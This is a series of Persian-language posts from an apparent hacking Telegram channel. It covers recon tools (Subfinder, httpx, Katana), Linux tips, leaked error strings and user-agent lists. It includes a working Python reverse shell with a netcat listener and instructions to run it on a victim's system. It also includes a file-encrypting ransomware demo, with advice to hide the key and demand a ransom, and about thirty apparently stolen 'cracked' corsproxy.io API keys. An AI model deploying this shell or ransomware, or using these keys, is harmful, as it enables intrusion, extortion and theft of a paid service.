لیست ۱۵ خطای رایج که اطلاعات حساس لو میدهند
#آموزشی #ℳℴ𝒷𝒾𝓃
Warning: mysqli_fetch_array() expects parameter...
Fatal error: Uncaught Exception...
Notice: Undefined index: user in...
Parse error: syntax error, unexpected...
PDOException: SQLSTATE[42000]...
Stack trace: #0 /var/www/html...
ORA-00933: SQL command not properly ended
Microsoft OLE DB Provider for ODBC Drivers
TypeError: Cannot read property...
NullPointerException at com.example...
Debugging info: SELECT * FROM users...
Traceback (most recent call last)...
Warning: pg_connect(): Unable to connect...
MySQL server version for the right syntax...
Path: /home/user/public_html/...
#آموزشی #ℳℴ𝒷𝒾𝓃
❤4🔥1
۵۰ عدد User-Agent:
#User-Agent #آموزشی #ℳℴ𝒷𝒾𝓃
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0
Mozilla/5.0 (X11; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.2365.52
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.2277.128
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.2365.52
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 OPR/107.0.0.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.15
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15
Mozilla/5.0 (iPhone; CPU iPhone OS 17_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Mobile/15E148 Safari/604.1
Mozilla/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1
Mozilla/5.0 (iPad; CPU OS 17_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Linux; Android 14; SM-S921B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 14; Pixel 8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 13; SM-G991B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 14; SM-T970) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
#User-Agent #آموزشی #ℳℴ𝒷𝒾𝓃
🔥4❤1👍1
تعدادی پروکسی کرک شده فعال از سایت corsproxy.io:
#Cors_Proxy #آموزشی #ℳℴ𝒷𝒾𝓃
https://corsproxy.io/?key=3ea6efce&url=http://example.com
https://corsproxy.io/?key=14140035&url=http://example.com
https://corsproxy.io/?key=1101a4e3&url=http://example.com
https://corsproxy.io/?key=7fe10987&url=http://example.com
https://corsproxy.io/?key=fa1a827f&url=http://example.com
https://corsproxy.io/?key=798be704&url=http://example.com
https://corsproxy.io/?key=5f0076e6&url=http://example.com
https://corsproxy.io/?key=bdf29fc5&url=http://example.com
https://corsproxy.io/?key=5f7d15ff&url=http://example.com
https://corsproxy.io/?key=839cf7da&url=http://example.com
https://corsproxy.io/?key=b9aac4bc&url=http://example.com
https://corsproxy.io/?key=856c89ff&url=http://example.com
https://corsproxy.io/?key=054af249&url=http://example.com
https://corsproxy.io/?key=02a83d86&url=http://example.com
https://corsproxy.io/?key=b5b98ce9&url=http://example.com
https://corsproxy.io/?key=f5bebaf5&url=http://example.com
https://corsproxy.io/?key=08677b5d&url=http://example.com
https://corsproxy.io/?key=9c95e1f7&url=http://example.com
https://corsproxy.io/?key=4b9f21b0&url=http://example.com
https://corsproxy.io/?key=d3b9501d&url=http://example.com
https://corsproxy.io/?key=2a6e1787&url=http://example.com
https://corsproxy.io/?key=86f67453&url=http://example.com
https://corsproxy.io/?key=eee8f095&url=http://example.com
https://corsproxy.io/?key=a435fa40&url=http://example.com
https://corsproxy.io/?key=4a61f73f&url=http://example.com
https://corsproxy.io/?key=b5a8fa6e&url=http://example.com
https://corsproxy.io/?key=e9871471&url=http://example.com
https://corsproxy.io/?key=4f2b3b5d&url=http://example.com
https://corsproxy.io/?key=345b7a9a&url=http://example.com
https://corsproxy.io/?key=4dbb19c1&url=http://example.com
#Cors_Proxy #آموزشی #ℳℴ𝒷𝒾𝓃
❤3⚡1🔥1
🌑 Hacker Fact | وقتی سایت مورد اعتماد تبدیل به تله میشه...
در حملهی Watering Hole، مهاجم یک وبسایت مورد اعتمادِ گروه هدف را آلوده یا دستکاری میکند تا بازدیدکنندگان آن را هدف قرار دهد. 👁️
🎯 قربانی ممکن است بدون کلیک روی یک لینک مشکوک، صرفاً با بازدید از یک سایت آشنا در معرض حمله قرار بگیرد.
⚠️ حتی سایتهای آشنا هم همیشه به معنی سایتهای امن نیستند.
---
🌑 Hacker Fact | When a Trusted Website Becomes a Trap...
In a Watering Hole Attack, an attacker compromises or manipulates a website trusted by the target group to target its visitors. 👁️
🎯 A victim may be exposed simply by visiting a familiar website, without clicking a suspicious link.
⚠️ A familiar website isn’t always a safe website.
#CyberSecurity #WateringHole #Hacking #RedTeam #Tyger
در حملهی Watering Hole، مهاجم یک وبسایت مورد اعتمادِ گروه هدف را آلوده یا دستکاری میکند تا بازدیدکنندگان آن را هدف قرار دهد. 👁️
🎯 قربانی ممکن است بدون کلیک روی یک لینک مشکوک، صرفاً با بازدید از یک سایت آشنا در معرض حمله قرار بگیرد.
⚠️ حتی سایتهای آشنا هم همیشه به معنی سایتهای امن نیستند.
---
🌑 Hacker Fact | When a Trusted Website Becomes a Trap...
In a Watering Hole Attack, an attacker compromises or manipulates a website trusted by the target group to target its visitors. 👁️
🎯 A victim may be exposed simply by visiting a familiar website, without clicking a suspicious link.
⚠️ A familiar website isn’t always a safe website.
#CyberSecurity #WateringHole #Hacking #RedTeam #Tyger
❤5
Please open Telegram to view this post
VIEW IN TELEGRAM
2🔥6❤3👍1
🎯 Victim Fact | قربانی همیشه متوجه نمیشود...
گاهی قربانی یک حمله ممکنه هفتهها یا حتی ماهها از حضور مهاجم در سیستمش خبر نداشته باشه. 👁️
مهاجم میتونه مدتی بدون ایجاد رفتار کاملاً واضح، اطلاعات جمعآوری کنه یا دسترسی خودش رو حفظ کنه.
⚠️ خطرناکترین حمله، همیشه حملهای نیست که سریع دیده بشه.
پ.ن: یاد فیلم Mr. Robot افتادم :)
---
🎯 Victim Fact | The Victim Doesn’t Always Notice...
Sometimes, a victim may remain unaware of an attacker’s presence for weeks or even months. 👁️
An attacker may stay under the radar while gathering information or maintaining access.
⚠️ The most dangerous attack isn’t always the one you notice immediately.
P.S.: This reminded me of Mr. Robot :)
#CyberSecurity #Victim #Hacking #RedTeam #Tyger
گاهی قربانی یک حمله ممکنه هفتهها یا حتی ماهها از حضور مهاجم در سیستمش خبر نداشته باشه. 👁️
مهاجم میتونه مدتی بدون ایجاد رفتار کاملاً واضح، اطلاعات جمعآوری کنه یا دسترسی خودش رو حفظ کنه.
⚠️ خطرناکترین حمله، همیشه حملهای نیست که سریع دیده بشه.
پ.ن: یاد فیلم Mr. Robot افتادم :)
---
🎯 Victim Fact | The Victim Doesn’t Always Notice...
Sometimes, a victim may remain unaware of an attacker’s presence for weeks or even months. 👁️
An attacker may stay under the radar while gathering information or maintaining access.
⚠️ The most dangerous attack isn’t always the one you notice immediately.
P.S.: This reminded me of Mr. Robot :)
#CyberSecurity #Victim #Hacking #RedTeam #Tyger
❤4
شل معکوس (Reverse Shell)
چطوری باید استفاده بکنید
خوب شما به عنوان هاکر در سیستم مهاجم ابتدا
nc -lvnp 4444
اجرا کنید، بعد این کد را در سیستم قربانی اجرا کنید.
این برای آموزش هست رو گوشی فامیل ها تست نکنید. 😂
#Shell #آموزشی #ℳℴ𝒷𝒾𝓃
# reverse_shell_demo.py
# این کد یک اتصال معکوس به سیستم مهاجم برقرار میکند
# فقط در محیط آزمایشی با اجازه صاحب سیستم
import socket
import subprocess
import os
# آدرس و پورت سیستم مهاجم (برای تست، از localhost استفاده کنید)
ATTACKER_IP = "127.0.0.1"
ATTACKER_PORT = 4444
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ATTACKER_IP, ATTACKER_PORT))
# ارسال پوسته به مهاجم
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
subprocess.call(["/bin/sh", "-i"])
چطوری باید استفاده بکنید
خوب شما به عنوان هاکر در سیستم مهاجم ابتدا
nc -lvnp 4444
اجرا کنید، بعد این کد را در سیستم قربانی اجرا کنید.
این برای آموزش هست رو گوشی فامیل ها تست نکنید. 😂
#Shell #آموزشی #ℳℴ𝒷𝒾𝓃
❤3
باجافزار نمایشی (Ransomware Demo)
برای استفاده
به cryptography نیاز داری
pip install cryptography
این کد فقط یک فایل در /tmp را رمزنگاری میکنه و بعد کلید رو نشون میده
تو نسخه حرفهای باید کلید را مخفی بکنید و درخواست رو هم باج بکنید. این بیشتر نمونه بود. ✅
#Ransomware #آموزشی #ℳℴ𝒷𝒾𝓃
# ransomware_demo.py
# این کد فقط یک فایل نمونه را در یک پوشه موقت رمزنگاری میکند
# برای درک مفهوم رمزنگاری، نه برای استفاده واقعی
import os
from cryptography.fernet import Fernet
# فقط یک فایل تستی در /tmp
test_file = "/tmp/testfile.txt"
# ساخت فایل نمونه
with open(test_file, "w") as f:
f.write("این یک فایل تست است")
# تولید کلید
key = Fernet.generate_key()
cipher = Fernet(key)
# رمزنگاری فایل
with open(test_file, "rb") as f:
data = f.read()
encrypted = cipher.encrypt(data)
with open(test_file + ".encrypted", "wb") as f:
f.write(encrypted)
# حذف فایل اصلی (در محیط واقعی ممکن است حذف شود)
os.remove(test_file)
print(f"فایل رمزنگاری شد. کلید: {key.decode()}")
برای استفاده
به cryptography نیاز داری
pip install cryptography
این کد فقط یک فایل در /tmp را رمزنگاری میکنه و بعد کلید رو نشون میده
تو نسخه حرفهای باید کلید را مخفی بکنید و درخواست رو هم باج بکنید. این بیشتر نمونه بود. ✅
#Ransomware #آموزشی #ℳℴ𝒷𝒾𝓃
❤3
🐧 آموزش ۳۰ ثانیهای لینوکس
🔎 دنبال یه فایل بین کلی پوشه میگردی؟ لازم نیست دونهدونه بگردی!
با "find" میتونی خیلی سریع پیداش کنی:
find ~ -name "filename"
اگه اسم کامل فایل یادت نیست، میتونی بخشی از اسمش رو جستجو کنی:
find ~ -iname "*config*"
⚡ یه دستور ساده، ولی کاربردی برای صرفهجویی کلی در زمان.
ترمینال رو دستکم نگیر! 🐧
#Linux #KaliLinux #LightKali #Terminal #LinuxTips #CyberSecurity #InfoSec
#Tyger
🔎 دنبال یه فایل بین کلی پوشه میگردی؟ لازم نیست دونهدونه بگردی!
با "find" میتونی خیلی سریع پیداش کنی:
find ~ -name "filename"
اگه اسم کامل فایل یادت نیست، میتونی بخشی از اسمش رو جستجو کنی:
find ~ -iname "*config*"
⚡ یه دستور ساده، ولی کاربردی برای صرفهجویی کلی در زمان.
ترمینال رو دستکم نگیر! 🐧
#Linux #KaliLinux #LightKali #Terminal #LinuxTips #CyberSecurity #InfoSec
#Tyger
❤2🔥1
🕵️♂️ Subfinder — پیدا کردن Subdomainها
اگه تازه وارد دنیای امنیت شدی، اول بدون Subdomain چیه 👇
فرض کن سایت اصلی اینه:
🌐
ممکنه بخشهای مختلف سایت روی آدرسهای جدا باشن، مثلاً:
🔹
🔹
🔹
به این آدرسهای فرعی میگیم Subdomain.
حالا Subfinder چیکار میکنه؟ 🤔
🔎 بهصورت Passive در منابع مختلف جستجو میکنه تا Subdomainهای مربوط به یک دامنه رو پیدا کنه؛ یعنی برای شروع کار لازم نیست مستقیم به سایت درخواستهای زیادی بفرسته.
📌 نصب در Kali:
⚡ مثال ساده:
یعنی:
👉 «Subdomainهای مربوط به
💾 اگه بخوای نتیجه رو داخل یک فایل ذخیره کنی:
🎯 به چه دردی میخوره؟
• 🔍 پیدا کردن داراییهای یک دامنه
• 🛡️ بررسی سطح حمله
• 🐞 Bug Bounty
• 🕵️ OSINT
💡 خلاصه:
⚠️ فقط روی دامنههایی که اجازه بررسیشون رو داری استفاده کن.
#Linux #KaliLinux #LightKali #Subfinder #BugBounty #OSINT #CyberSecurity
#Tyger
اگه تازه وارد دنیای امنیت شدی، اول بدون Subdomain چیه 👇
فرض کن سایت اصلی اینه:
🌐
example.comممکنه بخشهای مختلف سایت روی آدرسهای جدا باشن، مثلاً:
🔹
blog.example.com🔹
shop.example.com🔹
api.example.comبه این آدرسهای فرعی میگیم Subdomain.
حالا Subfinder چیکار میکنه؟ 🤔
🔎 بهصورت Passive در منابع مختلف جستجو میکنه تا Subdomainهای مربوط به یک دامنه رو پیدا کنه؛ یعنی برای شروع کار لازم نیست مستقیم به سایت درخواستهای زیادی بفرسته.
📌 نصب در Kali:
sudo apt install subfinder
⚡ مثال ساده:
subfinder -d example.com
یعنی:
👉 «Subdomainهای مربوط به
example.com رو پیدا کن.»💾 اگه بخوای نتیجه رو داخل یک فایل ذخیره کنی:
subfinder -d example.com -o subdomains.txt
🎯 به چه دردی میخوره؟
• 🔍 پیدا کردن داراییهای یک دامنه
• 🛡️ بررسی سطح حمله
• 🐞 Bug Bounty
• 🕵️ OSINT
💡 خلاصه:
example.com → 🔎 Subfinder → 📋 لیستی از Subdomainها⚠️ فقط روی دامنههایی که اجازه بررسیشون رو داری استفاده کن.
#Linux #KaliLinux #LightKali #Subfinder #BugBounty #OSINT #CyberSecurity
#Tyger
❤6🔥1
🐧 Linux Practical |
🐧 نسخه لینوکس رو چطور بفهمیم؟
با:
میتونی نام توزیع و نسخه سیستمعامل رو مشاهده کنی.
💡 این اطلاعات هنگام نصب ابزارها و عیبیابی مشکلات خیلی کاربردیه.
#Linux #KaliLinux #LightKali #LinuxTips #CyberSecurity
#Tyger
🐧 نسخه لینوکس رو چطور بفهمیم؟
با:
cat /etc/os-releaseمیتونی نام توزیع و نسخه سیستمعامل رو مشاهده کنی.
💡 این اطلاعات هنگام نصب ابزارها و عیبیابی مشکلات خیلی کاربردیه.
#Linux #KaliLinux #LightKali #LinuxTips #CyberSecurity
#Tyger
❤5
newfile.py
3.8 KB
یک آی پی اسکنر برای کرک سرور
سرعت نسبتا خوبی داره
اینم کتابخانه های قابل نصب
دیگه نیازی به توضیح اضافی نیست
دو سه روز سرم شلوغ مطمئن باشید جبران میکنم براتون
سرعت نسبتا خوبی داره
aiohttp aiodns coloramaاینم کتابخانه های قابل نصب
دیگه نیازی به توضیح اضافی نیست
دو سه روز سرم شلوغ مطمئن باشید جبران میکنم براتون
❤9⚡1
🌐 httpx — پیدا کردن سایتهای فعال
اگه پست قبلی رو دیده باشی، با Subfinder یاد گرفتیم چطور Subdomainها رو پیدا کنیم.
حالا فرض کن Subfinder اینا رو بهت داده:
🔹
🔹
🔹
اما از کجا بفهمیم کدومشون واقعاً سایت یا سرویس وب فعال دارن؟ 🤔
اینجاست که httpx به کار میاد. 👇
🔎 httpx آدرسهایی که بهش میدی رو بررسی میکنه و مشخص میکنه کدومها از طریق
HTTP/HTTPS
قابل دسترسی هستن.
📌 نصب در Kali:
⚡ بررسی یک سایت:
یعنی:
👉 «ببین این آدرس یک سرویس وب فعال داره یا نه.»
📂 حالا اگر از Subfinder یک فایل از Subdomainها داشته باشیم:
💾 ذخیره نتیجه داخل فایل:
🎯 پس Workflow ساده ما میشه:
💡 یعنی:
اول پیدا کن -> بعد بررسی کن کدومشون زندهان.
🛡️ کاربردها:
• بررسی سرویسهای وب فعال
• Web Reconnaissance
• Bug Bounty
• Asset Discovery
🔗 GitHub:
https://github.com/projectdiscovery/httpx
⚠️ فقط روی دامنهها و سیستمهایی که اجازه بررسیشون رو داری استفاده کن.
#Linux #KaliLinux #LightKali #HTTPX #BugBounty #WebSecurity
#Tyger
اگه پست قبلی رو دیده باشی، با Subfinder یاد گرفتیم چطور Subdomainها رو پیدا کنیم.
حالا فرض کن Subfinder اینا رو بهت داده:
🔹
blog.example.com🔹
api.example.com🔹
dev.example.comاما از کجا بفهمیم کدومشون واقعاً سایت یا سرویس وب فعال دارن؟ 🤔
اینجاست که httpx به کار میاد. 👇
🔎 httpx آدرسهایی که بهش میدی رو بررسی میکنه و مشخص میکنه کدومها از طریق
HTTP/HTTPS
قابل دسترسی هستن.
📌 نصب در Kali:
sudo apt install httpx-toolkit
⚡ بررسی یک سایت:
httpx -u https://example.com
یعنی:
👉 «ببین این آدرس یک سرویس وب فعال داره یا نه.»
📂 حالا اگر از Subfinder یک فایل از Subdomainها داشته باشیم:
httpx -l subdomains.txt
💾 ذخیره نتیجه داخل فایل:
httpx -l subdomains.txt -o live.txt
🎯 پس Workflow ساده ما میشه:
Subfinder 🔎 → پیدا کردن Subdomainهاhttpx 🌐 → پیدا کردن Subdomainهای فعال💡 یعنی:
اول پیدا کن -> بعد بررسی کن کدومشون زندهان.
🛡️ کاربردها:
• بررسی سرویسهای وب فعال
• Web Reconnaissance
• Bug Bounty
• Asset Discovery
🔗 GitHub:
https://github.com/projectdiscovery/httpx
⚠️ فقط روی دامنهها و سیستمهایی که اجازه بررسیشون رو داری استفاده کن.
#Linux #KaliLinux #LightKali #HTTPX #BugBounty #WebSecurity
#Tyger
GitHub
GitHub - projectdiscovery/httpx: httpx is a fast and multi-purpose HTTP toolkit that allows running multiple probes using the retryablehttp…
httpx is a fast and multi-purpose HTTP toolkit that allows running multiple probes using the retryablehttp library. - projectdiscovery/httpx
❤5🔥1
🐧 Linux Practical |
👤 الان با چه کاربری وارد شدی؟
فقط بزن:
"whoami"
و لینوکس نام کاربری فعلی رو بهت نشون میده.
💡 قبل از اجرای دستورات حساس، دونستن اینکه با چه Userای کار میکنی خیلی مهمه.
#Linux #KaliLinux #LightKali #LinuxSecurity #CyberSecurity
#Tyger
👤 الان با چه کاربری وارد شدی؟
فقط بزن:
"whoami"
و لینوکس نام کاربری فعلی رو بهت نشون میده.
💡 قبل از اجرای دستورات حساس، دونستن اینکه با چه Userای کار میکنی خیلی مهمه.
#Linux #KaliLinux #LightKali #LinuxSecurity #CyberSecurity
#Tyger
🔥2❤1
🕷 Katana — پیدا کردن مسیرهای داخل یک سایت
تا اینجا یاد گرفتیم:
🔎 Subfinder → پیدا کردن Subdomainها
🌐 httpx → پیدا کردن سرویسهای وب فعال
حالا سؤال اینه: داخل یک سایت چه صفحهها و مسیرهایی وجود داره؟ 🤔
اینجاست که Katana وارد میشه.
🕷 Katana یک ابزار Web Crawler هست؛ یعنی مثل یک عنکبوت 🕸️ لینکهای داخل یک سایت رو دنبال میکنه و آدرسهایی که پیدا میکنه رو جمعآوری میکنه.
مثلاً ممکنه از این:
به چیزهایی مثل این برسه:
🔹
🔹
🔹
🔹
به این آدرسهای مشخص داخل برنامه معمولاً Endpoint میگیم.
📌 نصب در Kali:
⚡ استفاده ساده:
یعنی:
👉 «لینکها و مسیرهایی که از این سایت قابل پیدا کردن هستن رو جمعآوری کن.»
💾 ذخیره نتیجه:
🎯 حالا Workflow ما داره کاملتر میشه:
⬇️
پیدا کردن Subdomainها
⬇️
پیدا کردن سرویسهای وب فعال
⬇️
پیدا کردن لینکها و Endpointها
💡 خلاصه:
Subfinder میگه «چه سایتهای فرعیای وجود دارن؟»
httpx میگه «کدومشون فعالن؟»
Katana میگه «داخل این سایت چه مسیرهایی پیدا میشه؟»
🛡️ کاربردها:
• Web Recon
• Endpoint Discovery
• بررسی ساختار Web Application
• Bug Bounty
🔗 GitHub:
https://github.com/projectdiscovery/katana
⚠️ فقط روی سایتها و سیستمهایی که اجازه بررسیشون رو داری استفاده کن.
#KaliLinux #Linux #LightKali #Katana #BugBounty #WebSecurity #CyberSecurity #Tyger
تا اینجا یاد گرفتیم:
🔎 Subfinder → پیدا کردن Subdomainها
🌐 httpx → پیدا کردن سرویسهای وب فعال
حالا سؤال اینه: داخل یک سایت چه صفحهها و مسیرهایی وجود داره؟ 🤔
اینجاست که Katana وارد میشه.
🕷 Katana یک ابزار Web Crawler هست؛ یعنی مثل یک عنکبوت 🕸️ لینکهای داخل یک سایت رو دنبال میکنه و آدرسهایی که پیدا میکنه رو جمعآوری میکنه.
مثلاً ممکنه از این:
https://example.comبه چیزهایی مثل این برسه:
🔹
/login🔹
/about🔹
/contact🔹
/api/usersبه این آدرسهای مشخص داخل برنامه معمولاً Endpoint میگیم.
📌 نصب در Kali:
sudo apt install katana
⚡ استفاده ساده:
katana -u https://example.com
یعنی:
👉 «لینکها و مسیرهایی که از این سایت قابل پیدا کردن هستن رو جمعآوری کن.»
💾 ذخیره نتیجه:
katana -u https://example.com -o endpoints.txt
🎯 حالا Workflow ما داره کاملتر میشه:
Subfinder 🔎⬇️
پیدا کردن Subdomainها
httpx 🌐⬇️
پیدا کردن سرویسهای وب فعال
Katana 🕷️⬇️
پیدا کردن لینکها و Endpointها
💡 خلاصه:
Subfinder میگه «چه سایتهای فرعیای وجود دارن؟»
httpx میگه «کدومشون فعالن؟»
Katana میگه «داخل این سایت چه مسیرهایی پیدا میشه؟»
🛡️ کاربردها:
• Web Recon
• Endpoint Discovery
• بررسی ساختار Web Application
• Bug Bounty
🔗 GitHub:
https://github.com/projectdiscovery/katana
⚠️ فقط روی سایتها و سیستمهایی که اجازه بررسیشون رو داری استفاده کن.
#KaliLinux #Linux #LightKali #Katana #BugBounty #WebSecurity #CyberSecurity #Tyger
GitHub
GitHub - projectdiscovery/katana: A next-generation crawling and spidering framework.
A next-generation crawling and spidering framework. - projectdiscovery/katana
❤2🔥1
radar.py
3.8 KB
📡 Advanced Radar — شبیهسازی رادار با Python
این پروژه با استفاده از Python + Pygame یک رادار گرافیکی متحرک ایجاد میکنه.
🔹 نمایش محدودههای دایرهای رادار
🔹 حرکت خط اسکن بهصورت ۳۶۰ درجه
🔹 Targetهای متحرک با افکت Pulse
🔹 اضافه و حذف شدن تصادفی Targetها
🔹 اجرای روان با نرخ 60 FPS
📦 نصب Pygame:
sudo apt update && sudo apt install python3-pygame -y
🚀 اجرا:
python3 radar.py
⚠️ این پروژه صرفاً یک شبیهسازی گرافیکی است و هیچ اسکن واقعی شبکه یا سیستم انجام نمیدهد.
#Python #Pygame #CyberSecurity #Programming #Radar #KaliLinux #Linux #LightKali
#Tyger
این پروژه با استفاده از Python + Pygame یک رادار گرافیکی متحرک ایجاد میکنه.
🔹 نمایش محدودههای دایرهای رادار
🔹 حرکت خط اسکن بهصورت ۳۶۰ درجه
🔹 Targetهای متحرک با افکت Pulse
🔹 اضافه و حذف شدن تصادفی Targetها
🔹 اجرای روان با نرخ 60 FPS
📦 نصب Pygame:
sudo apt update && sudo apt install python3-pygame -y
🚀 اجرا:
python3 radar.py
⚠️ این پروژه صرفاً یک شبیهسازی گرافیکی است و هیچ اسکن واقعی شبکه یا سیستم انجام نمیدهد.
#Python #Pygame #CyberSecurity #Programming #Radar #KaliLinux #Linux #LightKali
#Tyger
❤5👎2